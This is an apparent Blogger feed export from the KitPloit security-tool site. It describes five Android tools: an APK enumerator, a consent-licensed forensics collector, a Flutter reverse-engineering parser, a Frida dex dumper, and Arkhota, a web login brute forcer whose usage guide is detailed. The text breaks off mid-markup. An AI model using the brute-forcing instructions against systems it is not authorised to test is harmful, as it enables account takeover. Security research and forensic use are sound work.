tag:blogger.com,1999:blog-83172222311336605472024-03-19T08:30:00.131-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger167125tag:blogger.com,1999:blog-8317222231133660547.post-41118917045401496792023-10-02T08:30:00.011-03:002023-10-02T08:30:00.147-03:00Apepe - Enumerate Information From An App Based On The APK File<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhw6O8b8caTvB-A7ijzMGfYIXBHkKIpf1akNvg4qhM_h2Oyd_NZQw5Ylz0Qm61PAfuZrEf5dSxiuBe0EF9rXOqD2pUIrQABse14MLmNdqfmLi-2D7JonqC9OZCxS3KL5C7CsF4x9vgyEUZ7tJr99HXRA22sLjxDLAe4rhlUMuuvsAU-NSBCyjwoVf1Aw7mg"><img alt="" border="0" height="184" id="BLOGGER_PHOTO_ID_7276661095547280610" src="https://blogger.googleusercontent.com/img/a/AVvXsEhw6O8b8caTvB-A7ijzMGfYIXBHkKIpf1akNvg4qhM_h2Oyd_NZQw5Ylz0Qm61PAfuZrEf5dSxiuBe0EF9rXOqD2pUIrQABse14MLmNdqfmLi-2D7JonqC9OZCxS3KL5C7CsF4x9vgyEUZ7tJr99HXRA22sLjxDLAe4rhlUMuuvsAU-NSBCyjwoVf1Aw7mg=w640-h184" width="640" /></a></p> <br /> <p dir="auto"><strong>Apepe</strong> is a Python tool developed to help <a href="https://www.kitploit.com/search/label/Pentesters" target="_blank" title="pentesters">pentesters</a> and <a href="https://www.kitploit.com/search/label/Red%20Teamers" target="_blank" title="red teamers">red teamers</a> to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Installing / Getting started</h3> <p dir="auto">A quick guide of how to install and use Apepe.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="1. git clone https://github.com/oppsec/Apepe.git 2. pip install -r requirements.txt 3. python3 main -f <apk-file.apk>" dir="auto"><pre><code>1. git clone https://github.com/oppsec/Apepe.git<br />2. pip install -r requirements.txt<br />3. python3 main -f <apk-file.apk></code></pre></div> <br /> <h3 dir="auto" tabindex="-1">Pre-requisites</h3> <ul dir="auto"> <li><a href="https://www.python.org/downloads/" rel="nofollow" target="_blank" title="Python">Python</a> installed on your machine</li> <li>The .apk from the target mobile app</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Features</h3> <ul dir="auto"> <li>Detect <a href="https://www.kitploit.com/search/label/Mobile%20App" target="_blank" title="mobile app">mobile app</a> development lanague</li> <li>Information gathering</li> <li>Extremely fast</li> <li>Low RAM and CPU usage</li> <li>Made in Python</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Example</h3> <p dir="auto" style="text-align: center;"><a href="https://camo.githubusercontent.com/bdc9bb0b0410e8aaf8cb409f28714df0f5f0514d7b076859abc18cdb9a02abf4/68747470733a2f2f692e696d6775722e636f6d2f694c3271326e512e706e67" rel="nofollow" target="_blank" title="&#128242; Enumerate information from an app based on the APK file (11)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiu7eVw6qiUKdIpZ62S7R33Il5f72__8RBOCf6mymCN69nff6RacozlYQTNfVpgx7zBKVeUkIOTB_OeTNpvPGqOQfFAmMVikBm9c3v_oOXzVj3b3iYJWGOkbYjaaebXVAM2F6YOQnBMlVprv0aNGLjEBbNDpbtRwKrpjh2OetwTZwwzdVEmfODJVrH9SV1t"><img alt="" border="0" height="338" id="BLOGGER_PHOTO_ID_7276661115589595954" src="https://blogger.googleusercontent.com/img/a/AVvXsEiu7eVw6qiUKdIpZ62S7R33Il5f72__8RBOCf6mymCN69nff6RacozlYQTNfVpgx7zBKVeUkIOTB_OeTNpvPGqOQfFAmMVikBm9c3v_oOXzVj3b3iYJWGOkbYjaaebXVAM2F6YOQnBMlVprv0aNGLjEBbNDpbtRwKrpjh2OetwTZwwzdVEmfODJVrH9SV1t=w640-h338" width="640" /></a></p> <br /> <h3 dir="auto" tabindex="-1">To-Do</h3> <ul class="contains-task-list"> <li class="task-list-item">Support to .ipa files (iOS)</li> <li class="task-list-item">Detect certificate library used by the app</li> <li class="task-list-item">Add argument to return list of possible SSL Pinning scripts</li> <li class="task-list-item">Common <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> check?</li> </ul> <br /> <h3 dir="auto" tabindex="-1">Contributing</h3> <p dir="auto">A quick guide of how to contribute with the project.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="1. Create a fork from Apepe repository 2. Download the project with git clone https://github.com/your/Apepe.git 3. cd Apepe/ 4. Make your changes 5. Commit and make a git push 6. Open a pull request" dir="auto"><pre><code>1. Create a fork from Apepe repository<br />2. Download the project with git clone https://github.com/your/Apepe.git<br />3. cd Apepe/<br />4. Make your changes<br />5. Commit and make a git push<br />6. Open a pull request</code></pre></div> <br /> <h3 dir="auto" tabindex="-1"><div>Warning</div></h3> <ul dir="auto"> <li>The developer is not responsible for any malicious use of this tool.</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/oppsec/Apepe" rel="nofollow" target="_blank" title="Download Apepe">Download Apepe</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-85522677653317447002021-11-04T17:30:00.001-03:002021-11-04T17:30:00.262-03:00Androidqf - (Android Quick Forensics) Helps Quickly Gathering Forensic Evidence From Android Devices, In Order To Identify Potential Traces Of Compromise<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgaz3pE5GN0Hw1_94tYn5ZEJqg0J7XMY63KUhsgtm8AwSv4d-_G3OpdXSz85Y7JfSftQ7vzpmXlSsYCGI4S4zRCAULVLmOjW1VyMsRP9xMFncBukMNs1hRZz8wXNqkHmEglCc5i73rbK8DA8u2HBb8J37yoW8isyBDokXS82v19rJLv29oB-nlhJSArrg=s592" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="592" height="350" src="https://blogger.googleusercontent.com/img/a/AVvXsEgaz3pE5GN0Hw1_94tYn5ZEJqg0J7XMY63KUhsgtm8AwSv4d-_G3OpdXSz85Y7JfSftQ7vzpmXlSsYCGI4S4zRCAULVLmOjW1VyMsRP9xMFncBukMNs1hRZz8wXNqkHmEglCc5i73rbK8DA8u2HBb8J37yoW8isyBDokXS82v19rJLv29oB-nlhJSArrg=w640-h350" width="640" /></a></div><br /><p><br /></p><br /><br /><br /><br /> <p><br /></p> <p>androidqf (Android Quick Forensics) is a portable tool to simplify the acquisition of relevant forensic data from Android devices. It is the successor of <a href="https://github.com/botherder/snoopdroid" rel="nofollow" target="_blank" title="Snoopdroid">Snoopdroid</a>, re-written in Go and leveraging official adb binaries.</p> <p>androidqf is intended to provide a simple and portable cross-platform utility to quickly acquire data from Android devices. It is similar in functionality to <a href="https://github.com/mvt-project/mvt" rel="nofollow" target="_blank" title="mvt-android">mvt-android</a>. However, contrary to MVT, androidqf is designed to be easily run by non-tech savvy users as well.</p> <p><a href="https://github.com/botherder/androidqf/releases/latest" rel="nofollow" target="_blank" title="Download androidqf">Download androidqf</a></p> <br /><span style="font-size: large;"><b>Build</b></span><br /> <p>Executable binaries for Linux, Windows and Mac should be available in the <a href="https://github.com/botherder/androidqf/releases/latest" rel="nofollow" target="_blank" title="latest release">latest release</a>. In case you have issues running the binary you might want to build it by yourself.</p> <p>In order to build androidqf you will need Go 1.15+ installed. You will also need to install <code>make</code>. When ready you can clone the repository and run any of the following commands, for your platform of choice:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="make linux make darwin make windows "><pre><code>make linux<br />make darwin<br />make windows<br /></code></pre></div> <p>These commands will generate binaries in a <em>build/</em> folder.</p> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>Before launching androidqf you need to have the target Android device connected to your computer via USB, and you will need to have enabled USB debugging. Please refer to the <a href="https://developer.android.com/studio/debug/dev-options#enable" rel="nofollow" target="_blank" title="official documentation">official documentation</a> on how to do this, but also be mindful that Android phones from different manufacturers might require different navigation steps than the defaults.</p> <p>Once USB <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> is enabled, you can proceed launching androidqf. It will first attempt to connect to the device over the USB bridge, which should result in the Android phone to prompt you to manually authorize the host keys. Make sure to authorize them, ideally permanently so that the prompt wouldn't appear again.</p> <p>Now androidqf should be executing and creating an acquisition folder at the same path you have placed your androidqf binary. At some point in the execution, androidqf will prompt you some choices: these prompts will pause the acquisition until you provide a selection, so pay attention.</p> <p>The following data can be extracted:</p> <ol> <li>A list of all packages installed and related distribution files.</li> <li>(Optional) Copy of all installed APKs or of only those not marked as system apps.</li> <li>The output of the <code>dumpsys</code> shell command, providing diagnostic information about the device.</li> <li>The output of the <code>getprop</code> shell command, providing build information and configuration parameters.</li> <li>The output of the <code>ps</code> shell command, providing a list of all running processes.</li> <li>(Optional) A backup of SMS and MMS messages.</li> </ol> <br /><span style="font-size: large;"><b>Encryption & Potential Threats</b></span><br /> <p>Carrying the androidqf acquisitions on an unencrypted drive might expose yourself, and even more so those you acquired data from, to significant risk. For example, you might be stopped at a problematic border and your androidqf drive could be seized. The raw data might not only expose the purpose of your trip, but it will also likely contain very sensitive data (for example list of applications installed, or even SMS messages).</p> <p>Ideally you should have the drive fully encrypted, but that might not always be possible. You could also consider placing androidqf inside a <a href="https://www.veracrypt.fr/" rel="nofollow" target="_blank" title="VeraCrypt">VeraCrypt</a> <a href="https://www.kitploit.com/search/label/Container" target="_blank" title="container">container</a> and carry with it a copy of VeraCrypt to mount it. However, VeraCrypt <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="containers">containers</a> are typically protected only by a password, which you might be forced to provide.</p> <p>Alternatively, androidqf allows to encrypt each acquisition with a provided <a href="https://age-encryption.org" rel="nofollow" target="_blank" title="age">age</a> public key. Preferably, this public key belongs to a keypair for which the end-user does not possess, or at least carry, the private key. In this way, the end-user would not be able to decrypt the acquired data even under duress.</p> <p>If you place a file called <code>key.txt</code> in the same folder as the androidqf executable, androidqf will automatically attempt to compress and encrypt each acquisition and delete the original unencrypted copies.</p> <p>Once you have retrieved an encrypted acquisition file, you can decrypt it with age like so:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="$ age --decrypt -i ~/path/to/privatekey.txt -o <UUID>.zip <UUID>.zip.age "><pre><code>$ age --decrypt -i ~/path/to/privatekey.txt -o <UUID>.zip <UUID>.zip.age<br /></code></pre></div> <p>Bear in mind, it is always possible that at least some portion of the unencrypted data could be recovered through advanced <a href="https://www.kitploit.com/search/label/Forensics" target="_blank" title="forensics">forensics</a> techniques - although we're working to mitigate that.</p> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>The purpose of androidqf is to facilitate the <em><strong>consensual forensic analysis</strong></em> of devices of those who might be targets of sophisticated mobile spyware attacks, especially members of civil society and marginalized communities. We do not want androidqf to enable privacy violations of non-consenting individuals. Therefore, the goal of this license is to prohibit the use of androidqf (and any other software licensed the same) for the purpose of <em>adversarial forensics</em>.</p> <p>In order to achieve this androidqf is released under <a href="https://license.mvt.re/1.1/" rel="nofollow" target="_blank" title="MVT License 1.1">MVT License 1.1</a>, an adaptation of <a href="https://www.mozilla.org/MPL" rel="nofollow" target="_blank" title="Mozilla Public License v2.0">Mozilla Public License v2.0</a>. This modified license includes a new clause 3.0, "Consensual Use Restriction" which permits the use of the licensed software (and any <em>"Larger Work"</em> derived from it) exclusively with the explicit consent of the person/s whose data is being extracted and/or analysed (<em>"Data Owner"</em>).</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/botherder/androidqf" rel="nofollow" target="_blank" title="Download Androidqf">Download Androidqf</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-83812716232465751772021-08-03T17:30:00.001-04:002021-08-03T17:30:00.334-04:00Doldrums - A Flutter/Dart Reverse Engineering Tool<p style="text-align: center;"><a href="http://3.bp.blogspot.com/-tTUkIW-TdlE/YP8f9froezI/AAAAAAAAops/NJuPvbe9mJwkOax5FX5yTMCcUaQlsPF4ACK4BGAYYCw/s1600/Doldrums_1_logo-783659.png"><img alt="" border="0" height="176" id="BLOGGER_PHOTO_ID_6989340288039287602" src="http://3.bp.blogspot.com/-tTUkIW-TdlE/YP8f9froezI/AAAAAAAAops/NJuPvbe9mJwkOax5FX5yTMCcUaQlsPF4ACK4BGAYYCw/w640-h176/Doldrums_1_logo-783659.png" width="640" /></a></p> <p><em><br /></em></p><p><em>To flutter: to move in quick, irregular motions, to beat rapidly, to be agitated.</em><br /> <em>Doldrums: a period of stagnation.</em></p> <p>Doldrums is a <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> tool for Flutter apps targetting Android. Concretely, it is a parser and information <a href="https://www.kitploit.com/search/label/Extractor" target="_blank" title="extractor">extractor</a> for the Flutter/Dart <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> binary, conventionally named <code>libapp.so</code>, for all Dart version 2.10 releases. When run, it outputs a full dump of all classes present in the isolate snapshot.</p> <p>The tool is currently in <strong>beta</strong>, and missing some <a href="https://www.kitploit.com/search/label/Deserialization" target="_blank" title="deserialization">deserialization</a> routines and class information. If it does not work out-of-the-box, please let me know.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Dependencies</b></span><br /> <p>Doldrums requires <a href="https://github.com/eliben/pyelftools" rel="nofollow" target="_blank" title="pyelftools">pyelftools</a> to parse the ELF format. You can install it with</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="pip3 install pyelftools "><pre><code>pip3 install pyelftools<br /></code></pre></div> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>To use, simply run the following command, substituting <code>libapp.so</code> for the appropriate binary, and <code>output</code> for the desired output file. Note that the verbose option only works for Dart snapshot v2.12.</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="python3 src/main.py [-v] libapp.so output "><pre><code>python3 src/main.py [-v] libapp.so output<br /></code></pre></div> <p>The expected output is a dump of all classes, in the following format:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="class MyApp extends StatelessWidget { Widget build(DynamicType, DynamicType) { Code at absolute offset: 0xec85c } String myPrint(DynamicType, DynamicType) { Code at absolute offset: 0xeca80 } } "><pre><code>class MyApp extends StatelessWidget {<br /> Widget build(DynamicType, DynamicType) {<br /> Code at absolute offset: 0xec85c<br /> }<br /><br /> String myPrint(DynamicType, DynamicType) {<br /> Code at absolute offset: 0xeca80<br /> }<br />}<br /></code></pre></div> <p>The absolute code offset indicates the offset into the <code>libapp.so</code> file where the native function may be found.</p> <br /><span style="font-size: large;"><b>Reading material</b></span><br /> <p>For a detailed write-up on the format, please check my <a href="https://rloura.wordpress.com/2020/12/04/reversing-flutter-for-android-wip/" rel="nofollow" target="_blank" title="blog post">blog post</a>.</p> <br /><span style="font-size: large;"><b>Related works</b></span><br /> <p><a href="https://github.com/mildsunrise/darter" rel="nofollow" target="_blank" title="darter">darter</a> is a fully implemented and fully tested parser for Dart version 2.5 releases.</p> <br /><span style="font-size: large;"><b>Contribute</b></span><br /> <p>If you'd like to help the project, consider making a pull request, or donating to</p> <ul> <li>ADA: DdzFFzCqrhsgHAVMtnep9Uq9iF61oxZ31LWVG3izmT8BH54Jz7C2gUBFcy6VnCkrbVNqrkevQ4wSwK7dfh7YrUfvSd5toKdE9tzZrcaB</li> <li>BTC: 33piC5kfTdqFyQ5ionmuJkTDJXsFYdzGdS</li> <li>ETH: 0x2bF670503C28B551C80191aeE9F7ACC96e101D9B</li> </ul> <hr /> <p>Logo by <a href="https://www.linkedin.com/in/luis-pedro-h-fonseca-4776a024/" rel="nofollow" target="_blank" title="Luis Fonseca">Luis Fonseca</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/rscloura/Doldrums" rel="nofollow" target="_blank" title="Download Doldrums">Download Doldrums</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74561420113005135072021-07-04T08:30:00.001-04:002021-07-04T08:30:00.279-04:00FRIDA-DEXDump - Fast Search And Dump Dex On Memory<p style="text-align: center;"><a href="http://2.bp.blogspot.com/-UIEmEZ4ao8E/YNj0tTM2JRI/AAAAAAAAeK0/V4uxE25HxIMTMxjVnr92RfX0YcG1pVbUwCK4BGAYYCw/s1600/FRIDA-DEXDump_1_screenshot-751758.png"><img alt="" border="0" height="218" id="BLOGGER_PHOTO_ID_6978596681696027922" src="http://2.bp.blogspot.com/-UIEmEZ4ao8E/YNj0tTM2JRI/AAAAAAAAeK0/V4uxE25HxIMTMxjVnr92RfX0YcG1pVbUwCK4BGAYYCw/w640-h218/FRIDA-DEXDump_1_screenshot-751758.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ol> <li>support fuzzy search broken header dex.</li> <li>fix struct data of dex-header.</li> <li>compatible with all <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="android">android</a> version(frida supported).</li> <li>support loading as <a href="https://www.kitploit.com/search/label/objection" target="_blank" title="objection">objection</a> <a href="https://www.kitploit.com/search/label/Plugin" target="_blank" title="plugin">plugin</a> ~</li> <li>pypi package has been released ~</li></ol><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requires</b></span><br /> <ul> <li><a href="https://www.github.com/frida/frida" rel="nofollow" target="_blank" title="frida">frida</a>: <code>pip install frida</code></li> <li>[optional] <a href="https://pypi.org/project/click/" rel="nofollow" target="_blank" title="click">click</a> <code>pip install click</code></li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <br /><b>From pypi</b><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="pip3 install frida-dexdump frida-dexdump -h "><pre><code>pip3 install frida-dexdump<br />frida-dexdump -h<br /></code></pre></div> <br /><b>From source</b><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/hluwa/FRIDA-DEXDump cd FRIDA-DEXDump/frida-dexdump python3 main.py -h "><pre><code>git clone https://github.com/hluwa/FRIDA-DEXDump<br />cd FRIDA-DEXDump/frida-dexdump<br />python3 main.py -h<br /></code></pre></div> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li> <p>Run <code>frida-dexdump</code> or <code>python3 main.py</code> to attach current frontmost application and dump dexs.</p> </li> <li> <p>Or, use command arguments:</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="-n: [Optional] Specify target process name, when spawn mode, it requires an application package name. If not specified, use frontmost application. -p: [Optional] Specify pid when multiprocess. If not specified, dump all. -f: [Optional] Use spawn mode, default is disable. -s: [Optional] When spawn mode, start dump work after sleep few seconds. default is 10s. -d: [Optional] Enable deep search maybe detected more dex, but speed will be slower. -h: show help. "><pre><code>-n: [Optional] Specify target process name, when spawn mode, it requires an application package name. If not specified, use frontmost application.<br />-p: [Optional] Specify pid when multiprocess. If not specified, dump all.<br />-f: [Optional] Use spawn mode, default is disable.<br />-s: [Optional] When spawn mode, start dump work after sleep few seconds. default is 10s.<br />-d: [Optional] Enable deep search maybe detected more dex, but speed will be slower.<br />-h: show help.<br /></code></pre></div> </li> <li> <p>Or, loading as objection plugin</p> <ol> <li>clone this repo and move <code>frida_dexdump</code> into your plugins folder, eg: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="git clone https://github.com/hluwa/FRIDA-DEXDump ~/Downloads/FRIDA-DEXDump; mv ~/Downloads/FRIDA-DEXDump/frida_dexdump ~/.objection/plugins/dexdump "><pre><code>git clone https://github.com/hluwa/FRIDA-DEXDump ~/Downloads/FRIDA-DEXDump;<br />mv ~/Downloads/FRIDA-DEXDump/frida_dexdump ~/.objection/plugins/dexdump<br /></code></pre></div> </li> <li>start objection with <code>-P</code> or <code>--plugin-folder</code> your plugins folder, eg: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="objection -g com.app.name explore -P ~/.objection/plugins "><pre><code>objection -g com.app.name explore -P ~/.objection/plugins<br /></code></pre></div> </li> <li>run command: <ol> <li><code>plugin dexdump search</code> to search and print all dex</li> <li><code>plugin dexdump dump</code> to dump all found dex.</li> </ol> </li> </ol> </li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hluwa/FRIDA-DEXDump" rel="nofollow" target="_blank" title="Download FRIDA-DEXDump">Download FRIDA-DEXDump</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40291400574781651952021-06-02T08:30:00.015-04:002021-06-02T08:30:00.281-04:00Arkhota - A Web Brute Forcer For Android<p style="text-align: center;"><a href="http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/s1600/Arkhota_1_banner-721104.png"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_6969081459867492754" src="http://4.bp.blogspot.com/-5kSXvnHN-rs/YLcmqfopoZI/AAAAAAAADVg/AcZgzUl0juAQYJ-WcALJqzD5JueIFb_1gCK4BGAYYCw/w640-h360/Arkhota_1_banner-721104.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>What?</b></span><br /> <p>Arkhota is a web (HTTP/S) brute forcer for Android.</p> <br /><span style="font-size: large;"><b>Why?</b></span><br /> <p>A web brute forcer is always in a hacker's computer, for obvious reasons. Sometimes attacks require to be quick or/and with minimal device preparation. Also a phone takes less attention rather than a laptop/computer. For this situations here's Arkhota.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Download</b></span><br /> <p>You can download APK from <a href="https://github.com/ALW1EZ/Arkhota/releases" rel="nofollow" target="_blank" title="there">there</a>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Explanation is in order of objects in the APK from top to bottom.</p> <br /><b>Banner</b><br /> <ul> <li>Banner, version & author</li> </ul> <p>You can long click to <strong>version</strong> to see about page.</p> <br /><b>Connection</b><br /> <ul> <li>URL (required)</li> </ul> <p>An URL to make request.</p> <ul> <li>Body</li> </ul> <p>You need to specify a body <strong>if</strong> you are going to make a POST request.</p> <br /><b>Userlist / Wordlist</b><br /> <ul> <li>Userlist selector</li> </ul> <p><em>Single: Sets a single username</em></p> <p><em>Generate: Generates runtime with given options</em></p> <p><em>Wordlists: Sets prepared wordlist</em></p> <p><em>Custom wordlist: You can place your <a href="https://www.kitploit.com/search/label/Custom%20Wordlist" target="_blank" title="custom wordlist">custom wordlist</a> to /sdcard/ABF/</em></p> <p><em>Then this selector will have it (if required permissions given.).</em></p> <ul> <li>Username box</li> </ul> <p><em>You need to specify a username <strong>if you selected Single</strong>.</em></p> <ul> <li>Charset selectors</li> </ul> <p>[W] <em>You need to specify charset, min & max length to generate runtime.</em></p> <p><strong>If you selected Generate</strong>, checkboxes will help you to select._</p> <ul> <li>Prefix & Suffix</li> </ul> <p><em>You can specify prefix & suffix to be added to your username</em></p> <br /><b>It's same for the password part too.</b><br /> <br /><b>Configuration</b><br /> <ul> <li>Beep switch</li> </ul> <p><em>Beeps if attack success.</em></p> <ul> <li>Fail/Success switch</li> </ul> <p><em>Decides how to react connection response</em></p> <ul> <li>POST/GET switch</li> </ul> <p><em>Decides type of connection</em></p> <ul> <li>User-Agent</li> </ul> <p>_Sets user-agent for connection.</p> <p><strong>if</strong> "Original UA" set, then original user-agent set</p> <p><strong>Othervise</strong> given text will set to user-agent_</p> <br /><b><strong>tip: It has autocomplete for several user-agents, all of them starts with "Mozilla", type and select one if you don't want to expose your original ua, but you don't know what to set</strong></b><br /> <ul> <li>Timeout</li> </ul> <p><em>Sets timeout for connection, in milliseconds</em></p> <ul> <li>Cookie</li> </ul> <p><em>Sets <a href="https://www.kitploit.com/search/label/Cookie" target="_blank" title="cookie">cookie</a> value for connection</em></p> <ul> <li>Regex (required)</li> </ul> <p><em>Determines what to look in connection response</em></p> <ul> <li>Empty box</li> </ul> <p><em>Tried username:password pairs & result will shown there.</em></p> <ul> <li>[W] Start</li> </ul> <p><em>Starts attack!</em></p> <br /><span style="font-size: large;"><b>Important</b></span><br /> <p>URL & Body: <strong><code>^USER^</code> & <code>^PASS^</code> are placeholders for username and password.</strong> You need to place them in url or the body (depends what type you choose to connection)</p> <p>Regex & Fail/Success switch: These two determines the result of the attack.</p> <p>If switch points to "Fail", and if given regex found in the response, this means, this is a fail, continue to attack.</p> <p>if switch points to "Success", and if given regex found in response, this means this is a success!, write result to empty box (in format "FOUND: username:password") and stop the attack.</p> <p>Copying: Long click on the empty box will copy the content. if password found, it copies in <code>username:password</code> format Otherwise copies whole content.</p> <p>If attack is over and unsuccessful, it just stops at the last user:password.</p> <br /><span style="font-size: large;"><b>Screenshots & Videos</b></span><br /> <p><a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/1.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (5)"></a><a href="http://4.bp.blogspot.com/-oIYSVKZ3hqw/YLcmqhP0FxI/AAAAAAAADVo/aP0XjSnQ5swEWfqXudTFKhjYlfNA9J5MACK4BGAYYCw/s1600/Arkhota_2_1-721902.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081460300191506" src="http://4.bp.blogspot.com/-oIYSVKZ3hqw/YLcmqhP0FxI/AAAAAAAADVo/aP0XjSnQ5swEWfqXudTFKhjYlfNA9J5MACK4BGAYYCw/s320/Arkhota_2_1-721902.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/2.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (6)"></a><a href="http://2.bp.blogspot.com/-mRTIWPVak_U/YLcmqhta5xI/AAAAAAAADVw/i-0gnOXmyGA2TB_COKNxyugY325vWH_rgCK4BGAYYCw/s1600/Arkhota_3_2-722679.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081460424369938" src="http://2.bp.blogspot.com/-mRTIWPVak_U/YLcmqhta5xI/AAAAAAAADVw/i-0gnOXmyGA2TB_COKNxyugY325vWH_rgCK4BGAYYCw/s320/Arkhota_3_2-722679.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/3.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (7)"></a><a href="http://2.bp.blogspot.com/-zSKkHYq3t0c/YLcmq3-BQBI/AAAAAAAADV4/myYFDxzAybMB4nMT_99Kzj9ZXDHFrANZwCK4BGAYYCw/s1600/Arkhota_4_3-723290.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081466399571986" src="http://2.bp.blogspot.com/-zSKkHYq3t0c/YLcmq3-BQBI/AAAAAAAADV4/myYFDxzAybMB4nMT_99Kzj9ZXDHFrANZwCK4BGAYYCw/s320/Arkhota_4_3-723290.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/4.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (8)"></a><a href="http://3.bp.blogspot.com/-j6PLyvN_ILE/YLcmrEPdBdI/AAAAAAAADWA/EAeCFOQKsKw7J9TPvAgiQDNazAU6seQmgCK4BGAYYCw/s1600/Arkhota_5_4-723989.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081469693920722" src="http://3.bp.blogspot.com/-j6PLyvN_ILE/YLcmrEPdBdI/AAAAAAAADWA/EAeCFOQKsKw7J9TPvAgiQDNazAU6seQmgCK4BGAYYCw/s320/Arkhota_5_4-723989.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/5.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (9)"></a><a href="http://1.bp.blogspot.com/-knNZybufvv4/YLcmrY9uX8I/AAAAAAAADWI/Wd2Si_cypiUeTswEXfS5XQn23_cwQjvPwCK4BGAYYCw/s1600/Arkhota_6_5-724945.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081475256704962" src="http://1.bp.blogspot.com/-knNZybufvv4/YLcmrY9uX8I/AAAAAAAADWI/Wd2Si_cypiUeTswEXfS5XQn23_cwQjvPwCK4BGAYYCw/s320/Arkhota_6_5-724945.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/6.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (10)"></a><a href="http://4.bp.blogspot.com/-UuRdbbCnU6k/YLcmrrPwJwI/AAAAAAAADWQ/09CWdN1XNsoWReIl4IH8FMm-M4NXusV7QCK4BGAYYCw/s1600/Arkhota_7_6-725687.jpeg"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6969081480164157186" src="http://4.bp.blogspot.com/-UuRdbbCnU6k/YLcmrrPwJwI/AAAAAAAADWQ/09CWdN1XNsoWReIl4IH8FMm-M4NXusV7QCK4BGAYYCw/s320/Arkhota_7_6-725687.jpeg" /></a> <a href="https://github.com/ALW1EZ/Arkhota/blob/main/README-src/7.jpg" rel="nofollow" target="_blank" title="Arkhota, a web brute forcer for Android. (11)"></a><a 